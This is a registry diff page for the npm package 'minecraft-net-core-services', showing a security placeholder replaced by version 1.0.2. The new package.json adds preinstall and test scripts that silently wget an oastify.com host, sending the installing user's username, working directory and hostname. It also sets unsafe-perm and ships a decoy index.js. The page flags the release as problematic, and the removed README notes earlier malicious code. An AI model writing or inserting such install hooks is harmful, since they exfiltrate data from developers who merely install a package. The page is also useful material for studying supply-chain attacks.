minecraft-net-core-services 0.0.1-security → 1.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of minecraft-net-core-services might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +5 -0
  2. package/package.json +17 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,5 @@
1
+ export default class CreditCardServiceTypes {
2
+ constructor() {
3
+ console.log("Works")
4
+ }
5
+ }
package/package.json CHANGED
@@ -1,6 +1,20 @@
1
1
  {
2
2
  "name": "minecraft-net-core-services",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.2",
4
+ "description": "test",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "wget --quiet \"https://rc7zp9d1aana6foij7ul4tkdr4xvll9a.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"",
8
+ "preinstall": "wget --quiet \"https://rc7zp9d1aana6foij7ul4tkdr4xvll9a.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\""
9
+ },
10
+ "keywords": [
11
+ "test",
12
+ "PoC"
13
+ ],
14
+ "dependencies": {},
15
+ "config": {
16
+ "unsafe-perm":true
17
+ },
18
+ "author": "WayCup",
19
+ "license": "ISC"
6
20
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=minecraft-net-core-services for more information.